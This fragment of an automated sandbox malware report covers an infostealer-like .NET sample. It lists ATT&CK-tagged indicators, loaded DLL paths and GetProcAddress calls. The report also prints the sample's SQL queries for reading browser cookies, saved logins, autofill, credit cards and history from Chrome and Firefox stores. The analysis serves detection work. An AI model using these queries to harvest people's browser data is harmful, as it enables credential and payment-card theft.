id,type,fk,parent,position,title,keyword_id,folder_type,dateAdded,lastModified,guid,syncStatus,syncChangeCounter FROM moz_bookmarks\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,type,fk,parent,position,title,keyword_id,folder_type,dateadded,lastmodified,guid,syncstatus,syncchangecounter from moz_bookmarks\")\n \"SELECT id,place_id,anno_attribute_id,content,flags,expiration,type,dateAdded,lastModified FROM moz_annos\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,place_id,anno_attribute_id,content,flags,expiration,type,dateadded,lastmodified from moz_annos\")\n \"SELECT id,fieldname,value,timesUsed,firstUsed,lastUsed,guid FROM moz_formhistory\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,fieldname,value,timesused,firstused,lastused,guid from moz_formhistory\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-7", "type": 2, "relevance": 1, "name": "Contains PDB pathways", "description": "\"Silk.pdb\"", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" touched \"NDP SymBinder\" (Path: \"HKCU\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\INPROCSERVER32\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-16", "type": 2, "relevance": 2, "name": "Contains SQL queries", "description": "\"SELECT creation_utc,top_frame_site_key,host_key,name,value,encrypted_value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party FROM cookies\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select creation_utc,top_frame_site_key,host_key,name,value,encrypted_value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party from cookies\")\n \"SELECT origin_url,action_url,username_element,username_value,password_element,password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for,date_password_modified FROM logins\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select origin_url,action_url,username_element,username_value,password_element,password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for,date_password_modified from logins\")\n \"SELECT id,url,title,visit_count,typed_count,last_visit_time,hidden FROM urls\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,url,title,visit_count,typed_count,last_visit_time,hidden from urls\")\n \"SELECT id,guid,current_path,target_path,start_time,received_bytes,total_bytes,state,danger_type,interrupt_reason,hash,end_time,opened,last_access_time,transient,referrer,site_url,tab_url,tab_referrer_url,http_method,by_ext_id,by_ext_name,etag,last_modified,mime_type,original_mime_type,embedder_download_data FROM downloads\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,guid,current_path,target_path,start_time,received_bytes,total_bytes,state,danger_type,interrupt_reason,hash,end_time,opened,last_access_time,transient,referrer,site_url,tab_url,tab_referrer_url,http_method,by_ext_id,by_ext_name,etag,last_modified,mime_type,original_mime_type,embedder_download_data from downloads\")\n \"SELECT name,value,value_lower,date_created,date_last_used,count FROM autofill\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select name,value,value_lower,date_created,date_last_used,count from autofill\")\n \"SELECT guid,name_on_card,expiration_month,expiration_year,card_number_encrypted,date_modified,origin,use_count,use_date,billing_address_id,nickname FROM credit_cards\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select guid,name_on_card,expiration_month,expiration_year,card_number_encrypted,date_modified,origin,use_count,use_date,billing_address_id,nickname from credit_cards\")\n \"SELECT id,originAttributes,name,value,host,path,expiry,lastAccessed,creationTime,isSecure,isHttpOnly,inBrowserElement,sameSite,rawSameSite,schemeMap FROM moz_cookies\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,originattributes,name,value,host,path,expiry,lastaccessed,creationtime,issecure,ishttponly,inbrowserelement,samesite,rawsamesite,schememap from moz_cookies\")\n \"SELECT id,url,title,rev_host,visit_count,hidden,typed,frecency,last_visit_date,guid,foreign_count,url_hash,description,preview_image_url,origin_id,site_name FROM moz_places\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,url,title,rev_host,visit_count,hidden,typed,frecency,last_visit_date,guid,foreign_count,url_hash,description,preview_image_url,origin_id,site_name from moz_places\")\n \"SELECT id,type,fk,parent,position,title,keyword_id,folder_type,dateAdded,lastModified,guid,syncStatus,syncChangeCounter FROM moz_bookmarks\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,type,fk,parent,position,title,keyword_id,folder_type,dateadded,lastmodified,guid,syncstatus,syncchangecounter from moz_bookmarks\")\n \"SELECT id,place_id,anno_attribute_id,content,flags,expiration,type,dateAdded,lastModified FROM moz_annos\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,place_id,anno_attribute_id,content,flags,expiration,type,dateadded,lastmodified from moz_annos\")\n \"SELECT id,fieldname,value,timesUsed,firstUsed,lastUsed,guid FROM moz_formhistory\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, Indicator: \"select id,fieldname,value,timesused,firstused,lastused,guid from moz_formhistory\")", "origin": "File/Memory", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" [Source: 00000000-00003656-00000C2B-2464975166]\n Observed system executable string:\"%WINDIR%\\system32\\IMM32.DLL\" [Source: 00000000-00003656-00000C60-4362793216]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" [Source: 00000000-00003656-00000C28-4363822453]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" [Source: 00000000-00003656-00000C28-4364561975]\n Observed system executable string:\"%WINDIR%\\system32\\combase.dll\" [Source: 00000000-00003656-00000C28-4364657967]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" [Source: 00000000-00003656-00000C28-4366615575]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" [Source: 00000000-00003656-00000C28-4366665072]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll\" [Source: 00000000-00003656-00000C28-4367641604]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll\" [Source: 00000000-00003656-00000C28-4368014403]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" [Source: 00000000-00003656-00000C28-4368062400]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll\" [Source: 00000000-00003656-00000C28-4368498627]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll\" [Source: 00000000-00003656-00000C28-4368601530]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll\" [Source: 00000000-00003656-00000C28-4368970660]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll\" [Source: 00000000-00003656-00000C28-4369155286]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll\" [Source: 00000000-00003656-00000C28-4369240431]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll\" [Source: 00000000-00003656-00000C28-4369307440]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" [Source: 00000000-00003656-00000C28-4369576572]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" [Source: 00000000-00003656-00000C28-4369810255]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll\" [Source: 00000000-00003656-00000C28-4370030775]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" [Source: 00000000-00003656-00000C28-4370373326]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll\" [Source: 00000000-00003656-00000C28-4371218623]\n Observed system executable string:\"%WINDIR%\\system32\\en-US\\tzres.dll.mui\" [Source: 00000000-00003656-00000C28-4372803914]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll\" [Source: 00000000-00003656-00000C28-4373079370]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll\" [Source: 00000000-00003656-00000C28-4374261684]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll\" [Source: 00000000-00003656-00000C28-4374665406]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003656)\n 